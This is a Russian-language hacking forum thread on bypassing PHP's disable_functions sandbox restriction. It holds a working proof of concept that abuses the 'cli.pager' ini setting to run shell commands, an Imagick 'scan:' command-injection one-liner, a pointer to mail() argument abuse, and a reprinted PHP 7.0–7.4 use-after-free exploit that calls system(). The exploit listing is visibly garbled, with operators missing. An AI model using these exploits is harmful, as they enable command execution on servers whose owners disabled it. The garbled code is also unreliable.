Обход disable_functions

Discussion in 'База Знаний' started by l1ght, 13 Apr 2019.

  1. l1ght

    l1ght Elder - Старейшина

    Joined:
    5 Dec 2006
    Messages:
    192
    Likes Received:
    675
    Reputations:
    333
    Обход disable_functions в php-cli

    Имеем штатный набор php.ini
    Code:
    disable_functions=exec,passthru,shell_exec,system,proc_open..i.t.d
    который обламывает выполнение команд
    system('id');
    Code:
    PHP Warning:  system() has been disabled for security reasons in /home/root2/backtrick/test.php on line 2
    нашел альтернативу здесь:
    https://github.com/php/php-src/blob/master/ext/readline/readline_cli.c
    Code:
    /*
       +----------------------------------------------------------------------+
       | PHP Version 7                                                        |
       +----------------------------------------------------------------------+
       | Copyright (c) The PHP Group                                          |
       +----------------------------------------------------------------------+
       | This source file is subject to version 3.01 of the PHP license,      |
       | that is bundled with this package in the file LICENSE, and is        |
       | available through the world-wide-web at the following url:           |
       | http://www.php.net/license/3_01.txt                                  |
       | If you did not receive a copy of the PHP license and are unable to   |
       | obtain it through the world-wide-web, please send a note to          |
       | license@php.net so we can mail you a copy immediately.               |
       +----------------------------------------------------------------------+
       | Author: Marcus Boerger <helly@php.net>                               |
       |         Johannes Schlueter <johannes@php.net>                        |
       +----------------------------------------------------------------------+
    */
    
    #ifdef HAVE_CONFIG_H
    #include "config.h"
    #endif
    
    #include "php.h"
    
    #ifndef HAVE_RL_COMPLETION_MATCHES
    #define rl_completion_matches completion_matches
    #endif
    
    #include "php_globals.h"
    #include "php_variables.h"
    #include "zend_hash.h"
    #include "zend_modules.h"
    
    #include "SAPI.h"
    #include <locale.h>
    #include "zend.h"
    #include "zend_extensions.h"
    #include "php_ini.h"
    #include "php_globals.h"
    #include "php_main.h"
    #include "fopen_wrappers.h"
    #include "ext/standard/php_standard.h"
    #include "zend_smart_str.h"
    
    #ifdef __riscos__
    #include <unixlib/local.h>
    #endif
    
    #if HAVE_LIBEDIT
    #include <editline/readline.h>
    #else
    #include <readline/readline.h>
    #include <readline/history.h>
    #endif
    
    #include "zend_compile.h"
    #include "zend_execute.h"
    #include "zend_highlight.h"
    #include "zend_exceptions.h"
    
    #include "sapi/cli/cli.h"
    #include "readline_cli.h"
    
    #if defined(COMPILE_DL_READLINE) && !defined(PHP_WIN32)
    #include <dlfcn.h>
    #endif
    
    #ifndef RTLD_DEFAULT
    #define RTLD_DEFAULT NULL
    #endif
    
    #define DEFAULT_PROMPT "\\b \\> "
    
    ZEND_DECLARE_MODULE_GLOBALS(cli_readline);
    
    static char php_last_char = '\0';
    static FILE *pager_pipe = NULL;
    
    static size_t readline_shell_write(const char *str, size_t str_length) /* {{{ */
    {
       if (CLIR_G(prompt_str)) {
           smart_str_appendl(CLIR_G(prompt_str), str, str_length);
           return str_length;
       }
    
       if (CLIR_G(pager) && *CLIR_G(pager) && !pager_pipe) {
           pager_pipe = VCWD_POPEN(CLIR_G(pager), "w");
       }
       if (pager_pipe) {
           return fwrite(str, 1, MIN(str_length, 16384), pager_pipe);
       }
    
       return -1;
    }
    /* }}} */
    
    static size_t readline_shell_ub_write(const char *str, size_t str_length) /* {{{ */
    {
       /* We just store the last char here and then pass back to the
          caller (sapi_cli_single_write in sapi/cli) which will actually
          write due to -1 return code */
       php_last_char = str[str_length-1];
    
       return (size_t) -1;
    }
    /* }}} */
    
    static void cli_readline_init_globals(zend_cli_readline_globals *rg)
    {
       rg->pager = NULL;
       rg->prompt = NULL;
       rg->prompt_str = NULL;
    }
    
    PHP_INI_BEGIN()
       STD_PHP_INI_ENTRY("cli.pager", "", PHP_INI_ALL, OnUpdateString, pager, zend_cli_readline_globals, cli_readline_globals)
       STD_PHP_INI_ENTRY("cli.prompt", DEFAULT_PROMPT, PHP_INI_ALL, OnUpdateString, prompt, zend_cli_readline_globals, cli_readline_globals)
    PHP_INI_END()
    
    
    
    typedef enum {
       body,
       sstring,
       dstring,
       sstring_esc,
       dstring_esc,
       comment_line,
       comment_block,
       heredoc_start,
       heredoc,
       outside,
    } php_code_type;
    
    static zend_string *cli_get_prompt(char *block, char prompt) /* {{{ */
    {
       smart_str retval = {0};
       char *prompt_spec = CLIR_G(prompt) ? CLIR_G(prompt) : DEFAULT_PROMPT;
    
       do {
           if (*prompt_spec == '\\') {
               switch (prompt_spec[1]) {
               case '\\':
                   smart_str_appendc(&retval, '\\');
                   prompt_spec++;
                   break;
               case 'n':
                   smart_str_appendc(&retval, '\n');
                   prompt_spec++;
                   break;
               case 't':
                   smart_str_appendc(&retval, '\t');
                   prompt_spec++;
                   break;
               case 'e':
                   smart_str_appendc(&retval, '\033');
                   prompt_spec++;
                   break;
    
    
               case 'v':
                   smart_str_appends(&retval, PHP_VERSION);
                   prompt_spec++;
                   break;
               case 'b':
                   smart_str_appends(&retval, block);
                   prompt_spec++;
                   break;
               case '>':
                   smart_str_appendc(&retval, prompt);
                   prompt_spec++;
                   break;
               case '`':
                   smart_str_appendc(&retval, '`');
                   prompt_spec++;
                   break;
               default:
                   smart_str_appendc(&retval, '\\');
                   break;
               }
           } else if (*prompt_spec == '`') {
               char *prompt_end = strstr(prompt_spec + 1, "`");
               char *code;
    
               if (prompt_end) {
                   code = estrndup(prompt_spec + 1, prompt_end - prompt_spec - 1);
    
                   CLIR_G(prompt_str) = &retval;
                   zend_try {
                       zend_eval_stringl(code, prompt_end - prompt_spec - 1, NULL, "php prompt code");
                   } zend_end_try();
                   CLIR_G(prompt_str) = NULL;
                   efree(code);
                   prompt_spec = prompt_end;
               }
           } else {
               smart_str_appendc(&retval, *prompt_spec);
           }
       } while (++prompt_spec && *prompt_spec);
       smart_str_0(&retval);
       return retval.s;
    }
    /* }}} */
    
    static int cli_is_valid_code(char *code, size_t len, zend_string **prompt) /* {{{ */
    {
       int valid_end = 1, last_valid_end;
       int brackets_count = 0;
       int brace_count = 0;
       size_t i;
       php_code_type code_type = body;
       char *heredoc_tag = NULL;
       size_t heredoc_len;
    
       for (i = 0; i < len; ++i) {
           switch(code_type) {
               default:
                   switch(code[i]) {
                       case '{':
                           brackets_count++;
                           valid_end = 0;
                           break;
                       case '}':
                           if (brackets_count > 0) {
                               brackets_count--;
                           }
                           valid_end = brackets_count ? 0 : 1;
                           break;
                       case '(':
                           brace_count++;
                           valid_end = 0;
                           break;
                       case ')':
                           if (brace_count > 0) {
                               brace_count--;
                           }
                           valid_end = 0;
                           break;
                       case ';':
                           valid_end = brace_count == 0 && brackets_count == 0;
                           break;
                       case ' ':
                       case '\r':
                       case '\n':
                       case '\t':
                           break;
                       case '\'':
                           code_type = sstring;
                           break;
                       case '"':
                           code_type = dstring;
                           break;
                       case '#':
                           code_type = comment_line;
                           break;
                       case '/':
                           if (code[i+1] == '/') {
                               i++;
                               code_type = comment_line;
                               break;
                           }
                           if (code[i+1] == '*') {
                               last_valid_end = valid_end;
                               valid_end = 0;
                               code_type = comment_block;
                               i++;
                               break;
                           }
                           valid_end = 0;
                           break;
                       case '?':
                           if (code[i+1] == '>') {
                               i++;
                               code_type = outside;
                               break;
                           }
                           valid_end = 0;
                           break;
                       case '<':
                           valid_end = 0;
                           if (i + 2 < len && code[i+1] == '<' && code[i+2] == '<') {
                               i += 2;
                               code_type = heredoc_start;
                               heredoc_tag = NULL;
                               heredoc_len = 0;
                           }
                           break;
                       default:
                           valid_end = 0;
                           break;
                   }
                   break;
               case sstring:
                   if (code[i] == '\\') {
                       code_type = sstring_esc;
                   } else {
                       if (code[i] == '\'') {
                           code_type = body;
                       }
                   }
                   break;
               case sstring_esc:
                   code_type = sstring;
                   break;
               case dstring:
                   if (code[i] == '\\') {
                       code_type = dstring_esc;
                   } else {
                       if (code[i] == '"') {
                           code_type = body;
                       }
                   }
                   break;
               case dstring_esc:
                   code_type = dstring;
                   break;
               case comment_line:
                   if (code[i] == '\n') {
                       code_type = body;
                   }
                   break;
               case comment_block:
                   if (code[i-1] == '*' && code[i] == '/') {
                       code_type = body;
                       valid_end = last_valid_end;
                   }
                   break;
               case heredoc_start:
                   switch(code[i]) {
                       case ' ':
                       case '\t':
                       case '\'':
                           break;
                       case '\r':
                       case '\n':
                           if (heredoc_tag) {
                               code_type = heredoc;
                           } else {
                               /* Malformed heredoc without label */
                               code_type = body;
                           }
                           break;
                       default:
                           if (!heredoc_tag) {
                               heredoc_tag = code+i;
                           }
                           heredoc_len++;
                           break;
                   }
                   break;
               case heredoc:
                   ZEND_ASSERT(heredoc_tag);
                   if (code[i - (heredoc_len + 1)] == '\n' && !strncmp(code + i - heredoc_len, heredoc_tag, heredoc_len) && code[i] == '\n') {
                       code_type = body;
                   } else if (code[i - (heredoc_len + 2)] == '\n' && !strncmp(code + i - heredoc_len - 1, heredoc_tag, heredoc_len) && code[i-1] == ';' && code[i] == '\n') {
                       code_type = body;
                       valid_end = 1;
                   }
                   break;
               case outside:
                   if ((CG(short_tags) && !strncmp(code+i-1, "<?", 2))
                   ||  (i > 3 && !strncmp(code+i-4, "<?php", 5))
                   ) {
                       code_type = body;
                   }
                   break;
           }
       }
    
       switch (code_type) {
           default:
               if (brace_count) {
                   *prompt = cli_get_prompt("php", '(');
               } else if (brackets_count) {
                   *prompt = cli_get_prompt("php", '{');
               } else {
                   *prompt = cli_get_prompt("php", '>');
               }
               break;
           case sstring:
           case sstring_esc:
               *prompt = cli_get_prompt("php", '\'');
               break;
           case dstring:
           case dstring_esc:
               *prompt = cli_get_prompt("php", '"');
               break;
           case comment_block:
               *prompt = cli_get_prompt("/* ", '>');
               break;
           case heredoc:
               *prompt = cli_get_prompt("<<<", '>');
               break;
           case outside:
               *prompt = cli_get_prompt("   ", '>');
               break;
       }
    
       if (!valid_end || brackets_count) {
           return 0;
       } else {
           return 1;
       }
    }
    /* }}} */
    
    static char *cli_completion_generator_ht(const char *text, size_t textlen, int *state, HashTable *ht, void **pData) /* {{{ */
    {
       zend_string *name;
       zend_ulong number;
    
       if (!(*state % 2)) {
           zend_hash_internal_pointer_reset(ht);
           (*state)++;
       }
       while(zend_hash_has_more_elements(ht) == SUCCESS) {
           zend_hash_get_current_key(ht, &name, &number);
           if (!textlen || !strncmp(ZSTR_VAL(name), text, textlen)) {
               if (pData) {
                   *pData = zend_hash_get_current_data_ptr(ht);
               }
               zend_hash_move_forward(ht);
               return ZSTR_VAL(name);
           }
           if (zend_hash_move_forward(ht) == FAILURE) {
               break;
           }
       }
       (*state)++;
       return NULL;
    } /* }}} */
    
    static char *cli_completion_generator_var(const char *text, size_t textlen, int *state) /* {{{ */
    {
       char *retval, *tmp;
       zend_array *symbol_table = &EG(symbol_table);
    
       tmp = retval = cli_completion_generator_ht(text + 1, textlen - 1, state, symbol_table, NULL);
       if (retval) {
           retval = malloc(strlen(tmp) + 2);
           retval[0] = '$';
           strcpy(&retval[1], tmp);
           rl_completion_append_character = '\0';
       }
       return retval;
    } /* }}} */
    
    static char *cli_completion_generator_ini(const char *text, size_t textlen, int *state) /* {{{ */
    {
       char *retval, *tmp;
    
       tmp = retval = cli_completion_generator_ht(text + 1, textlen - 1, state, EG(ini_directives), NULL);
       if (retval) {
           retval = malloc(strlen(tmp) + 2);
           retval[0] = '#';
           strcpy(&retval[1], tmp);
           rl_completion_append_character = '=';
       }
       return retval;
    } /* }}} */
    
    static char *cli_completion_generator_func(const char *text, size_t textlen, int *state, HashTable *ht) /* {{{ */
    {
       zend_function *func;
       char *retval = cli_completion_generator_ht(text, textlen, state, ht, (void**)&func);
       if (retval) {
           rl_completion_append_character = '(';
           retval = strdup(ZSTR_VAL(func->common.function_name));
       }
    
       return retval;
    } /* }}} */
    
    static char *cli_completion_generator_class(const char *text, size_t textlen, int *state) /* {{{ */
    {
       zend_class_entry *ce;
       char *retval = cli_completion_generator_ht(text, textlen, state, EG(class_table), (void**)&ce);
       if (retval) {
           rl_completion_append_character = '\0';
           retval = strdup(ZSTR_VAL(ce->name));
       }
    
       return retval;
    } /* }}} */
    
    static char *cli_completion_generator_define(const char *text, size_t textlen, int *state, HashTable *ht) /* {{{ */
    {
       zend_class_entry **pce;
       char *retval = cli_completion_generator_ht(text, textlen, state, ht, (void**)&pce);
       if (retval) {
           rl_completion_append_character = '\0';
           retval = strdup(retval);
       }
    
       return retval;
    } /* }}} */
    
    static int cli_completion_state;
    
    static char *cli_completion_generator(const char *text, int index) /* {{{ */
    {
    /*
    TODO:
    - constants
    - maybe array keys
    - language constructs and other things outside a hashtable (echo, try, function, class, ...)
    - object/class members
    
    - future: respect scope ("php > function foo() { $[tab]" should only expand to local variables...)
    */
       char *retval = NULL;
       size_t textlen = strlen(text);
    
       if (!index) {
           cli_completion_state = 0;
       }
       if (text[0] == '$') {
           retval = cli_completion_generator_var(text, textlen, &cli_completion_state);
       } else if (text[0] == '#') {
           retval = cli_completion_generator_ini(text, textlen, &cli_completion_state);
       } else {
           char *lc_text, *class_name_end;
           zend_string *class_name = NULL;
           zend_class_entry *ce = NULL;
    
           class_name_end = strstr(text, "::");
           if (class_name_end) {
               size_t class_name_len = class_name_end - text;
               class_name = zend_string_alloc(class_name_len, 0);
               zend_str_tolower_copy(ZSTR_VAL(class_name), text, class_name_len);
               if ((ce = zend_lookup_class(class_name)) == NULL) {
                   zend_string_release_ex(class_name, 0);
                   return NULL;
               }
               lc_text = zend_str_tolower_dup(class_name_end + 2, textlen - 2 - class_name_len);
               textlen -= (class_name_len + 2);
           } else {
               lc_text = zend_str_tolower_dup(text, textlen);
           }
    
           switch (cli_completion_state) {
               case 0:
               case 1:
                   retval = cli_completion_generator_func(lc_text, textlen, &cli_completion_state, ce ? &ce->function_table : EG(function_table));
                   if (retval) {
                       break;
                   }
               case 2:
               case 3:
                   retval = cli_completion_generator_define(text, textlen, &cli_completion_state, ce ? &ce->constants_table : EG(zend_constants));
                   if (retval || ce) {
                       break;
                   }
               case 4:
               case 5:
                   retval = cli_completion_generator_class(lc_text, textlen, &cli_completion_state);
                   break;
               default:
                   break;
           }
           efree(lc_text);
           if (class_name) {
               zend_string_release_ex(class_name, 0);
           }
           if (ce && retval) {
               size_t len = ZSTR_LEN(ce->name) + 2 + strlen(retval) + 1;
               char *tmp = malloc(len);
    
               snprintf(tmp, len, "%s::%s", ZSTR_VAL(ce->name), retval);
               free(retval);
               retval = tmp;
           }
       }
    
       return retval;
    } /* }}} */
    
    static char **cli_code_completion(const char *text, int start, int end) /* {{{ */
    {
       return rl_completion_matches(text, cli_completion_generator);
    }
    /* }}} */
    
    static int readline_shell_run(void) /* {{{ */
    {
       char *line;
       size_t size = 4096, pos = 0, len;
       char *code = emalloc(size);
       zend_string *prompt = cli_get_prompt("php", '>');
       char *history_file;
       int history_lines_to_write = 0;
    
       if (PG(auto_prepend_file) && PG(auto_prepend_file)[0]) {
           zend_file_handle *prepend_file_p;
           zend_file_handle prepend_file;
    
           memset(&prepend_file, 0, sizeof(prepend_file));
           prepend_file.filename = PG(auto_prepend_file);
           prepend_file.opened_path = NULL;
           prepend_file.free_filename = 0;
           prepend_file.type = ZEND_HANDLE_FILENAME;
           prepend_file_p = &prepend_file;
    
           zend_execute_scripts(ZEND_REQUIRE, NULL, 1, prepend_file_p);
       }
    
    #ifndef PHP_WIN32
       history_file = tilde_expand("~/.php_history");
    #else
       spprintf(&history_file, MAX_PATH, "%s/.php_history", getenv("USERPROFILE"));
    #endif
       rl_attempted_completion_function = cli_code_completion;
    #ifndef PHP_WIN32
       rl_special_prefixes = "$";
    #endif
       read_history(history_file);
    
       EG(exit_status) = 0;
       while ((line = readline(ZSTR_VAL(prompt))) != NULL) {
           if (strcmp(line, "exit") == 0 || strcmp(line, "quit") == 0) {
               free(line);
               break;
           }
    
           if (!pos && !*line) {
               free(line);
               continue;
           }
    
           len = strlen(line);
    
           if (line[0] == '#') {
               char *param = strstr(&line[1], "=");
               if (param) {
                   zend_string *cmd;
                   param++;
                   cmd = zend_string_init(&line[1], param - &line[1] - 1, 0);
    
                   zend_alter_ini_entry_chars_ex(cmd, param, strlen(param), PHP_INI_USER, PHP_INI_STAGE_RUNTIME, 0);
                   zend_string_release_ex(cmd, 0);
                   add_history(line);
    
                   zend_string_release_ex(prompt, 0);
                   /* TODO: This might be wrong! */
                   prompt = cli_get_prompt("php", '>');
                   continue;
               }
           }
    
           if (pos + len + 2 > size) {
               size = pos + len + 2;
               code = erealloc(code, size);
           }
           memcpy(&code[pos], line, len);
           pos += len;
           code[pos] = '\n';
           code[++pos] = '\0';
    
           if (*line) {
               add_history(line);
               history_lines_to_write += 1;
           }
    
           free(line);
           zend_string_release_ex(prompt, 0);
    
           if (!cli_is_valid_code(code, pos, &prompt)) {
               continue;
           }
    
           if (history_lines_to_write) {
    #if HAVE_LIBEDIT
               write_history(history_file);
    #else
               append_history(history_lines_to_write, history_file);
    #endif
               history_lines_to_write = 0;
           }
    
           zend_try {
               zend_eval_stringl(code, pos, NULL, "php shell code");
           } zend_end_try();
    
           pos = 0;
    
           if (!pager_pipe && php_last_char != '\0' && php_last_char != '\n') {
               php_write("\n", 1);
           }
    
           if (EG(exception)) {
               zend_exception_error(EG(exception), E_WARNING);
           }
    
           if (pager_pipe) {
               fclose(pager_pipe);
               pager_pipe = NULL;
           }
    
           php_last_char = '\0';
       }
    #ifdef PHP_WIN32
       efree(history_file);
    #else
       free(history_file);
    #endif
       efree(code);
       zend_string_release_ex(prompt, 0);
       return EG(exit_status);
    }
    /* }}} */
    
    #ifdef PHP_WIN32
    typedef cli_shell_callbacks_t *(__cdecl *get_cli_shell_callbacks)(void);
    #define GET_SHELL_CB(cb) \
       do { \
           get_cli_shell_callbacks get_callbacks; \
           HMODULE hMod = GetModuleHandle("php.exe"); \
           (cb) = NULL; \
           if (strlen(sapi_module.name) >= 3 && 0 == strncmp("cli", sapi_module.name, 3)) { \
               get_callbacks = (get_cli_shell_callbacks)GetProcAddress(hMod, "php_cli_get_shell_callbacks"); \
               if (get_callbacks) { \
                   (cb) = get_callbacks(); \
               } \
           } \
       } while(0)
    
    #else
    /*
    #ifdef COMPILE_DL_READLINE
    This dlsym() is always used as even the CGI SAPI is linked against "CLI"-only
    extensions. If that is being changed dlsym() should only be used when building
    this extension sharedto offer compatibility.
    */
    #define GET_SHELL_CB(cb) \
       do { \
           (cb) = NULL; \
           cli_shell_callbacks_t *(*get_callbacks)(); \
           get_callbacks = dlsym(RTLD_DEFAULT, "php_cli_get_shell_callbacks"); \
           if (get_callbacks) { \
               (cb) = get_callbacks(); \
           } \
       } while(0)
    /*#else
    #define GET_SHELL_CB(cb) (cb) = php_cli_get_shell_callbacks()
    #endif*/
    #endif
    
    PHP_MINIT_FUNCTION(cli_readline)
    {
       cli_shell_callbacks_t *cb;
    
       ZEND_INIT_MODULE_GLOBALS(cli_readline, cli_readline_init_globals, NULL);
       REGISTER_INI_ENTRIES();
    
    #if HAVE_LIBEDIT
       REGISTER_STRING_CONSTANT("READLINE_LIB", "libedit", CONST_CS|CONST_PERSISTENT);
    #else
       REGISTER_STRING_CONSTANT("READLINE_LIB", "readline", CONST_CS|CONST_PERSISTENT);
    #endif
    
       GET_SHELL_CB(cb);
       if (cb) {
           cb->cli_shell_write = readline_shell_write;
           cb->cli_shell_ub_write = readline_shell_ub_write;
           cb->cli_shell_run = readline_shell_run;
       }
    
       return SUCCESS;
    }
    
    PHP_MSHUTDOWN_FUNCTION(cli_readline)
    {
       cli_shell_callbacks_t *cb;
    
       UNREGISTER_INI_ENTRIES();
    
       GET_SHELL_CB(cb);
       if (cb) {
           cb->cli_shell_write = NULL;
           cb->cli_shell_ub_write = NULL;
           cb->cli_shell_run = NULL;
       }
    
       return SUCCESS;
    }
    
    PHP_MINFO_FUNCTION(cli_readline)
    {
       php_info_print_table_start();
       php_info_print_table_header(2, "Readline Support", "enabled");
    #ifdef PHP_WIN32
       php_info_print_table_row(2, "Readline library", "WinEditLine");
    #else
       php_info_print_table_row(2, "Readline library", (rl_library_version ? rl_library_version : "Unknown"));
    #endif
       php_info_print_table_end();
    
       DISPLAY_INI_ENTRIES();
    }
    нас интересует
    Code:
    static size_t readline_shell_write(const char *str, size_t str_length) /* {{{ */
    {
       if (CLIR_G(prompt_str)) {
           smart_str_appendl(CLIR_G(prompt_str), str, str_length);
           return str_length;
       }
    
       if (CLIR_G(pager) && *CLIR_G(pager) && !pager_pipe) {
           pager_pipe = VCWD_POPEN(CLIR_G(pager), "w");
       }
       if (pager_pipe) {
           return fwrite(str, 1, MIN(str_length, 16384), pager_pipe);
       }
    
       return -1;
    }
    Code:
    STD_PHP_INI_ENTRY("cli.pager", "", PHP_INI_ALL, OnUpdateString, pager, zend_cli_readline_globals, cli_readline_globals)
    cli.pager - одна из дирректив readline
    https://www.php.net/manual/ru/readline.configuration.php

    poc:
    Code:
    <?php
    echo "system:".system('id');
    ini_set('cli.pager','id;pwd');
    print_r(readline_info());
    проверяем:
    Code:
    php -d disable_functions=exec,passthru,shell_exec,system,proc_open,popen,curl_exec,curl_multi_exec,parse_ini_file,show_source test.php
    =>
    Code:
    PHP Warning:  system() has been disabled for security reasons in /home/root2/backtrick/test.php on line 2
    system:Array
    (
       [line_buffer] =>
       [point] => 0
       [end] => 0
       [library_version] => EditLine wrapper
       [readline_name] =>
       [attempted_completion_over] => 0
    )
    uid=0(root) gid=0(root) groups=0(root)
    /home/root2/backtrick
    php >=5.4.0
     
    #1 l1ght, 13 Apr 2019
    Last edited by a moderator: 30 Jan 2020
  2. pas9x

    pas9x Elder - Старейшина

    Joined:
    13 Oct 2012
    Messages:
    428
    Likes Received:
    578
    Reputations:
    47
    У функции mail() ещё есть пятый аргумент в котором указываются опции sendmail. С помощью этих опций тоже можно выполнить команду. Но тут всё зависит от реализации sendmail. На одном сервере она может предоставляться через postfix, на другом через exim. Сам этот метод ещё не пробовал, но видел статью в котором о нём рассказывается.

    Вообще через пятый аргумент mail() можно много чего наделать: https://www.saotn.org/exploit-phps-mail-get-remote-code-execution/
     
    dmax0fw, b3, BillyBons and 1 other person like this.
  3. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,413
    Likes Received:
    805
    Reputations:
    841
    _________________________
    joelblack likes this.
  4. VY_CMa

    VY_CMa Green member

    Joined:
    6 Jan 2012
    Messages:
    909
    Likes Received:
    461
    Reputations:
    722
    _________________________
    winstrool, grimnir, joelblack and 2 others like this.
  5. grimnir

    grimnir Members of Antichat

    Joined:
    23 Apr 2012
    Messages:
    1,097
    Likes Received:
    788
    Reputations:
    230
  6. crlf

    crlf Green member

    Joined:
    18 Mar 2016
    Messages:
    551
    Likes Received:
    1,038
    Reputations:
    352
    ImageMagick <= 6.9.3 (с пропатченным ImageTragick/GhostScript)

    PHP:
    new Imagick('scan:"|ls>/tmp/lol;"');
     
    #6 crlf, 21 Aug 2019
    Last edited: 22 Aug 2019
    l1ght, Gorbachev, winstrool and 4 others like this.
  7. crlf

    crlf Green member

    Joined:
    18 Mar 2016
    Messages:
    551
    Likes Received:
    1,038
    Reputations:
    352
    PHP 7.0-7.4 disable_functions bypass

    https://github.com/mm0r1/exploits/tree/master/php7-backtrace-bypass

    PHP 7.0-7.4 disable_functions bypass
    This exploit uses a two year old bug in debug_backtrace() function. We can trick it into returning a reference to a variable that has been destroyed, causing a use-after-free vulnerability. The PoC was tested on various php builds for Debian/Ubuntu/CentOS/FreeBSD with cli/fpm/apache2 server APIs and found to work reliably.

    Targets
    • 7.0 - all versions to date
    • 7.1 - all versions to date
    • 7.2 - all versions to date
    • 7.3 - all versions to date
    • 7.4 - all versions to date
    PHP:
    <?php

    # PHP 7.0-7.4 disable_functions bypass PoC (*nix only)
    #
    # Bug: https://bugs.php.net/bug.php?id=76047
    # debug_backtrace() returns a reference to a variable
    # that has been destroyed, causing a UAF vulnerability.
    #
    # This exploit should work on all PHP 7.0-7.4 versions
    # released as of 30/01/2020.
    #
    # Author: https://github.com/mm0r1

    pwn("uname -a");

    function 
    pwn($cmd) {
       global 
    $abc$helper$backtrace;

       class 
    Vuln {
           public 
    $a;
           public function 
    __destruct() {
               global 
    $backtrace;
               unset(
    $this->a);
               
    $backtrace = (new Exception)->getTrace(); # ;)
               
    if(!isset($backtrace[1]['args'])) { # PHP >= 7.4
                   
    $backtrace debug_backtrace();
               }
           }
       }

       class 
    Helper {
           public 
    $a$b$c$d;
       }

       function 
    str2ptr(&$str$p 0$s 8) {
           
    $address 0;
           for(
    $j $s-1$j >= 0$j--) {
               
    $address <<= 8;
               
    $address |= ord($str[$p+$j]);
           }
           return 
    $address;
       }

       function 
    ptr2str($ptr$m 8) {
           
    $out "";
           for (
    $i=0$i $m$i++) {
               
    $out .= chr($ptr 0xff);
               
    $ptr >>= 8;
           }
           return 
    $out;
       }

       function 
    write(&$str$p$v$n 8) {
           
    $i 0;
           for(
    $i 0$i $n$i++) {
               
    $str[$p $i] = chr($v 0xff);
               
    $v >>= 8;
           }
       }

       function 
    leak($addr$p 0$s 8) {
           global 
    $abc$helper;
           
    write($abc0x68$addr $p 0x10);
           
    $leak strlen($helper->a);
           if(
    $s != 8) { $leak %= << ($s 8) - 1; }
           return 
    $leak;
       }

       function 
    parse_elf($base) {
           
    $e_type leak($base0x102);

           
    $e_phoff leak($base0x20);
           
    $e_phentsize leak($base0x362);
           
    $e_phnum leak($base0x382);

           for(
    $i 0$i $e_phnum$i++) {
               
    $header $base $e_phoff $i $e_phentsize;
               
    $p_type  leak($header04);
               
    $p_flags leak($header44);
               
    $p_vaddr leak($header0x10);
               
    $p_memsz leak($header0x28);

               if(
    $p_type == && $p_flags == 6) { # PT_LOAD, PF_Read_Write
                   # handle pie
                   
    $data_addr $e_type == $p_vaddr $base $p_vaddr;
                   
    $data_size $p_memsz;
               } else if(
    $p_type == && $p_flags == 5) { # PT_LOAD, PF_Read_exec
                   
    $text_size $p_memsz;
               }
           }

           if(!
    $data_addr || !$text_size || !$data_size)
               return 
    false;

           return [
    $data_addr$text_size$data_size];
       }

       function 
    get_basic_funcs($base$elf) {
           list(
    $data_addr$text_size$data_size) = $elf;
           for(
    $i 0$i $data_size 8$i++) {
               
    $leak leak($data_addr$i 8);
               if(
    $leak $base && $leak $base $data_addr $base) {
                   
    $deref leak($leak);
                   
    # 'constant' constant check
                   
    if($deref != 0x746e6174736e6f63)
                       continue;
               } else continue;

               
    $leak leak($data_addr, ($i 4) * 8);
               if(
    $leak $base && $leak $base $data_addr $base) {
                   
    $deref leak($leak);
                   
    # 'bin2hex' constant check
                   
    if($deref != 0x786568326e6962)
                       continue;
               } else continue;

               return 
    $data_addr $i 8;
           }
       }

       function 
    get_binary_base($binary_leak) {
           
    $base 0;
           
    $start $binary_leak 0xfffffffffffff000;
           for(
    $i 0$i 0x1000$i++) {
               
    $addr $start 0x1000 $i;
               
    $leak leak($addr07);
               if(
    $leak == 0x10102464c457f) { # ELF header
                   
    return $addr;
               }
           }
       }

       function 
    get_system($basic_funcs) {
           
    $addr $basic_funcs;
           do {
               
    $f_entry leak($addr);
               
    $f_name leak($f_entry06);

               if(
    $f_name == 0x6d6574737973) { # system
                   
    return leak($addr 8);
               }
               
    $addr += 0x20;
           } while(
    $f_entry != 0);
           return 
    false;
       }

       function 
    trigger_uaf($arg) {
           
    # str_shuffle prevents opcache string interning
           
    $arg str_shuffle(str_repeat('A'79));
           
    $vuln = new Vuln();
           
    $vuln->$arg;
       }

       if(
    stristr(PHP_OS'WIN')) {
           die(
    'This PoC is for *nix systems only.');
       }

       
    $n_alloc 10# increase this value if UAF fails
       
    $contiguous = [];
       for(
    $i 0$i $n_alloc$i++)
           
    $contiguous[] = str_shuffle(str_repeat('A'79));

       
    trigger_uaf('x');
       
    $abc $backtrace[1]['args'][0];

       
    $helper = new Helper;
       
    $helper->= function ($x) { };

       if(
    strlen($abc) == 79 || strlen($abc) == 0) {
           die(
    "UAF failed");
       }

       
    # leaks
       
    $closure_handlers str2ptr($abc0);
       
    $php_heap str2ptr($abc0x58);
       
    $abc_addr $php_heap 0xc8;

       
    # fake value
       
    write($abc0x602);
       
    write($abc0x706);

       
    # fake reference
       
    write($abc0x10$abc_addr 0x60);
       
    write($abc0x180xa);

       
    $closure_obj str2ptr($abc0x20);

       
    $binary_leak leak($closure_handlers8);
       if(!(
    $base get_binary_base($binary_leak))) {
           die(
    "Couldn't determine binary base address");
       }

       if(!(
    $elf parse_elf($base))) {
           die(
    "Couldn't parse ELF header");
       }

       if(!(
    $basic_funcs get_basic_funcs($base$elf))) {
           die(
    "Couldn't get basic_functions address");
       }

       if(!(
    $zif_system get_system($basic_funcs))) {
           die(
    "Couldn't get zif_system address");
       }

       
    # fake closure object
       
    $fake_obj_offset 0xd0;
       for(
    $i 0$i 0x110$i += 8) {
           
    write($abc$fake_obj_offset $ileak($closure_obj$i));
       }

       
    # pwn
       
    write($abc0x20$abc_addr $fake_obj_offset);
       
    write($abc0xd0 0x3814); # internal func type
       
    write($abc0xd0 0x68$zif_system); # internal func handler

       
    ($helper->b)($cmd);
       exit();
    }
     
    joelblack, dooble and Baskin-Robbins like this.